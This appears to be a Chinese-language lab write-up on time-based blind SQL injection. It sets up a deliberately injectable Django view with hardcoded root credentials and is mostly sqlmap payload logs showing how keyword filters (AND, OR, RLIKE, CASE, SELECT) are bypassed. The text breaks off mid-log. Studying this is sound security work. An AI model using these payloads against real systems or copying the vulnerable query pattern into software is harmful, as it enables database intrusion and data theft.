def te(request): id = request.GET.get("id") db = pymysql.connect("127.0.0.1", "root", "123456", "t1", charset='utf8') cursor = db.cursor() cursor.execute("SELECT * FROM test where id =" + id) data = cursor.fetchone() db.close() return HttpResponse(data[1])
正常页面
加上单引号
在SQLMAP注入检测技术有这几种
基于时间注入(T)
注入命令
--level 5 --risk 3 --batch --dbms=mysql -v 3 -p id --flush-session --technique=T
[22:19:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'[22:19:32] [PAYLOAD] 1) AND SLEEP(5)-- RfYH[22:19:32] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)[22:19:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:33] [PAYLOAD] 1) AND SLEEP(5) AND (9830=9830[22:19:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:33] [PAYLOAD] 1)) AND SLEEP(5) AND ((9685=9685[22:19:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:33] [PAYLOAD] 1))) AND SLEEP(5) AND (((6020=6020[22:19:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:33] [PAYLOAD] 1 AND SLEEP(5)[22:19:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:38] [PAYLOAD] 1 AND SLEEP(0)[22:19:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:38] [PAYLOAD] 1 AND SLEEP(5)[22:19:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:43] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable[22:19:43] [PAYLOAD] 1 AND 6670=IF((61=61),SLEEP(5),6670)[22:19:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:48] [PAYLOAD] 1 AND 6666=IF((61=78),SLEEP(5),6666)[22:19:48] [PAYLOAD] 1 AND 4347=IF((61=99),SLEEP(5),4347)[22:19:48] [PAYLOAD] 1 AND 4376=IF((99=78),SLEEP(5),4376)[22:19:48] [PAYLOAD] 1 AND 3045=IF((78=78),SLEEP(5),3045)[22:19:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:53] [PAYLOAD] 1 AND 7064=IF((99 78),SLEEP(5),7064)[22:19:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:53] [PAYLOAD] 1 AND 4629=IF((16=16),SLEEP(5),4629)[22:19:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:19:58] [PAYLOAD] 1 AND 5264=IF((16=40),SLEEP(5),5264)[22:19:58] [PAYLOAD] 1 AND 6070=IF((16=93),SLEEP(5),6070)[22:19:58] [PAYLOAD] 1 AND 7543=IF((93=40),SLEEP(5),7543)[22:19:58] [PAYLOAD] 1 AND 3147=IF((40=40),SLEEP(5),3147)[22:20:03] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:04] [PAYLOAD] 1 AND 8849=IF((93 40),SLEEP(5),8849)[22:20:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:04] [PAYLOAD] 1 AND 8037=IF((11=11),SLEEP(5),8037)[22:20:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:09] [PAYLOAD] 1 AND 1374=IF((11=19),SLEEP(5),1374)[22:20:09] [PAYLOAD] 1 AND 7006=IF((11=55),SLEEP(5),7006)[22:20:09] [PAYLOAD] 1 AND 9634=IF((55=19),SLEEP(5),9634)[22:20:09] [PAYLOAD] 1 AND 9001=IF((19=19),SLEEP(5),9001)[22:20:14] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:14] [PAYLOAD] 1 AND 8633=IF((55 19),SLEEP(5),8633)[22:20:14] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:14] [PAYLOAD] 1 AND 3268=IF((39=39),SLEEP(5),3268)[22:20:19] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:19] [PAYLOAD] 1 AND 8941=IF((39=95),SLEEP(5),8941)[22:20:19] [PAYLOAD] 1 AND 8749=IF((39=99),SLEEP(5),8749)[22:20:19] [PAYLOAD] 1 AND 3479=IF((99=95),SLEEP(5),3479)[22:20:19] [PAYLOAD] 1 AND 7395=IF((95=95),SLEEP(5),7395)[22:20:24] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:24] [PAYLOAD] 1 AND 7236=IF((99 95),SLEEP(5),7236)[22:20:24] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:24] [PAYLOAD] 1 AND 2647=IF((16=16),SLEEP(5),2647)[22:20:29] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:29] [PAYLOAD] 1 AND 1648=IF((16=18),SLEEP(5),1648)[22:20:29] [PAYLOAD] 1 AND 9955=IF((16=72),SLEEP(5),9955)[22:20:29] [PAYLOAD] 1 AND 5891=IF((72=18),SLEEP(5),5891)[22:20:29] [PAYLOAD] 1 AND 2035=IF((18=18),SLEEP(5),2035)[22:20:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:34] [PAYLOAD] 1 AND 9912=IF((72 18),SLEEP(5),9912)[22:20:34] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:34] [DEBUG] checking for parameter length constrainting mechanisms[22:20:34] [PAYLOAD] 1 AND 7575=IF((4938= 4938),SLEEP(5),7575)[22:20:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:20:39] [DEBUG] checking for filtered characters[22:20:39] [PAYLOAD] 1 AND 3720=IF((5937>5936),SLEEP(5),3720)[22:20:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[22:20:44] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 67 HTTP(s) requests:---Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=1 AND SLEEP(5) Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---[22:20:44] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.12
使用这个payload的时候,测试能不能使用if函数,如果if成功则会睡眠5秒,
否则返回6670,而6670又等于外面的6670,所以会返回1
假如我禁止使用字符串AND
sqlmap就会自己选择or
当使用or+slee(5)的时候,无法执行sleep
[22:35:43] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'[22:35:43] [PAYLOAD] 1) OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1)) OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1))) OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1 OR SLEEP(5)#[22:35:43] [PAYLOAD] 1) WHERE 1129=1129 OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1 WHERE 5039=5039 OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1)) AS aXdd WHERE 6537=6537 OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1) AS yosm WHERE 7331=7331 OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1` WHERE 3927=3927 OR SLEEP(5)#[22:35:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:43] [PAYLOAD] 1`) WHERE 9536=9536 OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1') OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1' OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1" OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1')) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1'))) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1") OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1")) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1"))) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%') OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%')) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%'))) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%' OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%") OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%")) OR SLEEP(5)#[22:35:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:44] [PAYLOAD] 1%"))) OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1%" OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1') WHERE 1477=1477 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1") WHERE 2319=2319 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1' WHERE 5508=5508 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1" WHERE 9299=9299 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1'||(SELECT 'gxbY' FROM DUAL WHERE 3409=3409 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1'||(SELECT 'XQiD' WHERE 6808=6808 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1'+(SELECT MsiW WHERE 5089=5089 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1'+(SELECT 'tHYQ' WHERE 6487=6487 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1')) AS EeuT WHERE 2138=2138 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1")) AS zUfI WHERE 4750=4750 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1') AS NSxT WHERE 1030=1030 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:35:45] [PAYLOAD] 1") AS jGtE WHERE 8551=8551 OR SLEEP(5)#[22:35:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)
就会切换成这种模式
[22:35:56] [INFO] checking if the injection point on GET parameter 'id' is a false positive[22:35:56] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(37=37,0,5)))))Drzz)[22:36:01] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(37=62,0,5)))))uxWh)[22:36:01] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(37=75,0,5)))))gkcr)[22:36:01] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(75=62,0,5)))))HftH)[22:36:01] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(62=62,0,5)))))PEif)[22:36:06] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(75 62,0,5)))))rIqx)[22:36:06] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:36:06] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(41=41,0,5)))))AiYm)[22:36:11] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(41=48,0,5)))))ksnP)[22:36:11] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(41=60,0,5)))))hfID)[22:36:11] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(60=48,0,5)))))FdQf)[22:36:11] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(48=48,0,5)))))sOgu)[22:36:16] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(60 48,0,5)))))nQeP)[22:36:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:36:16] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(12=12,0,5)))))BobY)[22:36:21] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(12=39,0,5)))))Vnya)[22:36:22] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(12=90,0,5)))))dioX)[22:36:22] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(90=39,0,5)))))uINL)[22:36:22] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=39,0,5)))))UhqQ)[22:36:27] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(90 39,0,5)))))aHQG)[22:36:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:36:27] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=39,0,5)))))BVgV)[22:36:32] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=57,0,5)))))uDwn)[22:36:32] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=72,0,5)))))OtdM)[22:36:32] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(72=57,0,5)))))XExQ)[22:36:32] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(57=57,0,5)))))MeGs)[22:36:37] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(72 57,0,5)))))USnO)[22:36:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:36:37] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(38=38,0,5)))))kNFY)[22:36:42] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(38=39,0,5)))))LZUq)[22:36:42] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(38=62,0,5)))))CbGw)[22:36:42] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(62=39,0,5)))))fatr)[22:36:42] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(39=39,0,5)))))wnqf)[22:36:47] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(62 39,0,5)))))vOsj)[22:36:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:36:47] [DEBUG] checking for parameter length constrainting mechanisms[22:36:47] [PAYLOAD] 1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(2557=
成功睡眠
它将结果作为一个子查询作为一个表,后面那个Drzz是作为别名返回。
1 OR (SELECT * FROM (SELECT(SLEEP(5-(IF(37=37,0,5)))))Drzz)
假如禁掉的是AND,IF字符串,就会失败
假如禁掉的是AND,OR字符串
在MySQL中,RLIKE运算符用于确定字符串是否匹配正则表达式。它是REGEXP_LIKE()的同义词。如果字符串与提供的正则表达式匹配,则结果为1,否则为0。
[22:59:15] [INFO] checking if the injection point on GET parameter 'id' is a false positive[22:59:15] [PAYLOAD] 1 RLIKE (SELECT 6936=IF((30=30),SLEEP(5),6936))[22:59:20] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:21] [PAYLOAD] 1 RLIKE (SELECT 1879=IF((30=59),SLEEP(5),1879))[22:59:21] [PAYLOAD] 1 RLIKE (SELECT 4259=IF((30=79),SLEEP(5),4259))[22:59:21] [PAYLOAD] 1 RLIKE (SELECT 1368=IF((79=59),SLEEP(5),1368))[22:59:22] [PAYLOAD] 1 RLIKE (SELECT 2671=IF((59=59),SLEEP(5),2671))[22:59:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:27] [PAYLOAD] 1 RLIKE (SELECT 6464=IF((79 59),SLEEP(5),6464))[22:59:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:27] [PAYLOAD] 1 RLIKE (SELECT 8940=IF((34=34),SLEEP(5),8940))[22:59:32] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:32] [PAYLOAD] 1 RLIKE (SELECT 4099=IF((34=69),SLEEP(5),4099))[22:59:32] [PAYLOAD] 1 RLIKE (SELECT 4609=IF((34=85),SLEEP(5),4609))[22:59:32] [PAYLOAD] 1 RLIKE (SELECT 5560=IF((85=69),SLEEP(5),5560))[22:59:32] [PAYLOAD] 1 RLIKE (SELECT 8957=IF((69=69),SLEEP(5),8957))[22:59:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:37] [PAYLOAD] 1 RLIKE (SELECT 2173=IF((85 69),SLEEP(5),2173))[22:59:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:37] [PAYLOAD] 1 RLIKE (SELECT 1282=IF((27=27),SLEEP(5),1282))[22:59:42] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:42] [PAYLOAD] 1 RLIKE (SELECT 7694=IF((27=77),SLEEP(5),7694))[22:59:42] [PAYLOAD] 1 RLIKE (SELECT 6583=IF((27=93),SLEEP(5),6583))[22:59:42] [PAYLOAD] 1 RLIKE (SELECT 9747=IF((93=77),SLEEP(5),9747))[22:59:42] [PAYLOAD] 1 RLIKE (SELECT 9719=IF((77=77),SLEEP(5),9719))[22:59:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:47] [PAYLOAD] 1 RLIKE (SELECT 6903=IF((93 77),SLEEP(5),6903))[22:59:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:47] [PAYLOAD] 1 RLIKE (SELECT 2802=IF((29=29),SLEEP(5),2802))[22:59:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:52] [PAYLOAD] 1 RLIKE (SELECT 8059=IF((29=44),SLEEP(5),8059))[22:59:52] [PAYLOAD] 1 RLIKE (SELECT 5050=IF((29=69),SLEEP(5),5050))[22:59:52] [PAYLOAD] 1 RLIKE (SELECT 6203=IF((69=44),SLEEP(5),6203))[22:59:52] [PAYLOAD] 1 RLIKE (SELECT 6233=IF((44=44),SLEEP(5),6233))[22:59:57] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:57] [PAYLOAD] 1 RLIKE (SELECT 2840=IF((69 44),SLEEP(5),2840))[22:59:57] [DEBUG] got HTTP error code: 500 (Internal Server Error)[22:59:57] [PAYLOAD] 1 RLIKE (SELECT 5151=IF((32=32),SLEEP(5),5151))[23:00:02] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:00:02] [PAYLOAD] 1 RLIKE (SELECT 9793=IF((32=71),SLEEP(5),9793))[23:00:02] [PAYLOAD] 1 RLIKE (SELECT 6044=IF((32=83),SLEEP(5),6044))[23:00:02] [PAYLOAD] 1 RLIKE (SELECT 6513=IF((83=71),SLEEP(5),6513))[23:00:02] [PAYLOAD] 1 RLIKE (SELECT 7971=IF((71=71),SLEEP(5),7971))[23:00:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:00:07] [PAYLOAD] 1 RLIKE (SELECT 3576=IF((83 71),SLEEP(5),3576))[23:00:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:00:08] [DEBUG] checking for parameter length constrainting mechanisms[23:00:08] [PAYLOAD] 1 RLIKE (SELECT 4796=IF((9305= 9305),SLEEP(5),4796))[23:00:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:00:13] [DEBUG] checking for filtered characters[23:00:13] [PAYLOAD] 1 RLIKE (SELECT 7423=IF((2249>2248),SLEEP(5),7423))
假如禁掉的是AND,OR,RLIKE字符串
数据SQL CASE 表达式是一种通用的条件表达式,类似于其它语言中的 if/else 语句。 CASE WHEN condition THEN result WHEN condition THEN result ............. [WHEN ...] [ELSE result] END CASE 子句可以用于任何表达式可以有效存在的地方。 condition 是一个返回boolean 的表达式。 如果结果为真,那么 CASE 表达式的结果就是符合条件的 result。 如果结果为假,那么以相同方式搜寻任何随后的 WHEN 子句。 如果没有 WHEN condition 为真,那么 case 表达式的结果就是在 ELSE 子句里的值。 如果省略了 ELSE 子句而且没有匹配的条件, 结果为 NULL。或其语法为:简单Case函数 CASE sex WHEN '1' THEN '男' WHEN '2' THEN '女' ELSE '其他' END 建议都使用名列前茅种,少
[23:03:11] [INFO] checking if the injection point on GET parameter 'id' is a false positive[23:03:11] [PAYLOAD] (CASE WHEN (13=13) THEN SLEEP(5) ELSE 9315 END)[23:03:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:16] [PAYLOAD] (CASE WHEN (13=29) THEN SLEEP(5) ELSE 2370 END)[23:03:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:16] [PAYLOAD] (CASE WHEN (13=56) THEN SLEEP(5) ELSE 9841 END)[23:03:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:16] [PAYLOAD] (CASE WHEN (56=29) THEN SLEEP(5) ELSE 8206 END)[23:03:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:16] [PAYLOAD] (CASE WHEN (29=29) THEN SLEEP(5) ELSE 7582 END)[23:03:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:22] [PAYLOAD] (CASE WHEN (56 29) THEN SLEEP(5) ELSE 7064 END)[23:03:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:22] [PAYLOAD] (CASE WHEN (52=52) THEN SLEEP(5) ELSE 1764 END)[23:03:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:27] [PAYLOAD] (CASE WHEN (52=88) THEN SLEEP(5) ELSE 3749 END)[23:03:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:27] [PAYLOAD] (CASE WHEN (52=95) THEN SLEEP(5) ELSE 7047 END)[23:03:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:27] [PAYLOAD] (CASE WHEN (95=88) THEN SLEEP(5) ELSE 9320 END)[23:03:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:27] [PAYLOAD] (CASE WHEN (88=88) THEN SLEEP(5) ELSE 7829 END)[23:03:32] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:32] [PAYLOAD] (CASE WHEN (95 88) THEN SLEEP(5) ELSE 1663 END)[23:03:32] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:32] [PAYLOAD] (CASE WHEN (51=51) THEN SLEEP(5) ELSE 8885 END)[23:03:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:37] [PAYLOAD] (CASE WHEN (51=75) THEN SLEEP(5) ELSE 2713 END)[23:03:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:37] [PAYLOAD] (CASE WHEN (51=89) THEN SLEEP(5) ELSE 2195 END)[23:03:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:37] [PAYLOAD] (CASE WHEN (89=75) THEN SLEEP(5) ELSE 6522 END)[23:03:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:37] [PAYLOAD] (CASE WHEN (75=75) THEN SLEEP(5) ELSE 4869 END)[23:03:42] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:42] [PAYLOAD] (CASE WHEN (89 75) THEN SLEEP(5) ELSE 7742 END)[23:03:42] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:42] [PAYLOAD] (CASE WHEN (52=52) THEN SLEEP(5) ELSE 7375 END)[23:03:47] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:48] [PAYLOAD] (CASE WHEN (52=60) THEN SLEEP(5) ELSE 7982 END)[23:03:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:48] [PAYLOAD] (CASE WHEN (52=85) THEN SLEEP(5) ELSE 9535 END)[23:03:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:48] [PAYLOAD] (CASE WHEN (85=60) THEN SLEEP(5) ELSE 1355 END)[23:03:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:48] [PAYLOAD] (CASE WHEN (60=60) THEN SLEEP(5) ELSE 6053 END)[23:03:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:53] [PAYLOAD] (CASE WHEN (85 60) THEN SLEEP(5) ELSE 1168 END)[23:03:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:53] [PAYLOAD] (CASE WHEN (61=61) THEN SLEEP(5) ELSE 1220 END)[23:03:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:58] [PAYLOAD] (CASE WHEN (61=63) THEN SLEEP(5) ELSE 1146 END)[23:03:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:58] [PAYLOAD] (CASE WHEN (61=90) THEN SLEEP(5) ELSE 8312 END)[23:03:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:58] [PAYLOAD] (CASE WHEN (90=63) THEN SLEEP(5) ELSE 7015 END)[23:03:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:03:58] [PAYLOAD] (CASE WHEN (63=63) THEN SLEEP(5) ELSE 5683 END)[23:04:03] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:04:03] [PAYLOAD] (CASE WHEN (90 63) THEN SLEEP(5) ELSE 1858 END)[23:04:03] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:04:03] [DEBUG] checking for parameter length constrainting mechanisms[23:04:03] [PAYLOAD] (CASE WHEN (5036= 5036) THEN SLEEP(5) ELSE 3974 END)[23:04:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:04:08] [DEBUG] checking for filtered characters[23:04:08] [PAYLOAD] (CASE WHEN (6800>6799) THEN SLEEP(5) ELSE 4861 END)[23:04:13] [DEBUG] got HTTP error code: 500 (Internal Server Error)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[23:04:13] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 1052 HTTP(s) requests:---Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: id=(CASE WHEN (6409=6409) THEN SLEEP(5) ELSE 6409 END) Vector: (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)---[23:04:13] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.12
假如禁掉的是AND,OR,RLIKE,CASE字符串,就会直接使用select进行查询,不适用and,or
假如禁掉的是AND,OR,RLIKE,CASE,SELECT字符串
ELT(N,str1,str2,str3,...)如果N =1返回str1,如果N= 2返回str2,等等。返回NULL如果参数的数量小于1或大于N。ELT()是FIELD()的补集。
[23:08:59] [INFO] checking if the injection point on GET parameter 'id' is a false positive[23:08:59] [PAYLOAD] ELT(24=24,SLEEP(5))[23:09:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:04] [PAYLOAD] ELT(24=44,SLEEP(5))[23:09:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:04] [PAYLOAD] ELT(24=65,SLEEP(5))[23:09:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:05] [PAYLOAD] ELT(65=44,SLEEP(5))[23:09:05] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:05] [PAYLOAD] ELT(44=44,SLEEP(5))[23:09:10] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:10] [PAYLOAD] ELT(65 44,SLEEP(5))[23:09:10] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:10] [PAYLOAD] ELT(33=33,SLEEP(5))[23:09:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:15] [PAYLOAD] ELT(33=59,SLEEP(5))[23:09:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:15] [PAYLOAD] ELT(33=77,SLEEP(5))[23:09:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:15] [PAYLOAD] ELT(77=59,SLEEP(5))[23:09:15] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:15] [PAYLOAD] ELT(59=59,SLEEP(5))[23:09:20] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:20] [PAYLOAD] ELT(77 59,SLEEP(5))[23:09:20] [DEBUG] got HTTP error code: 500 (Internal 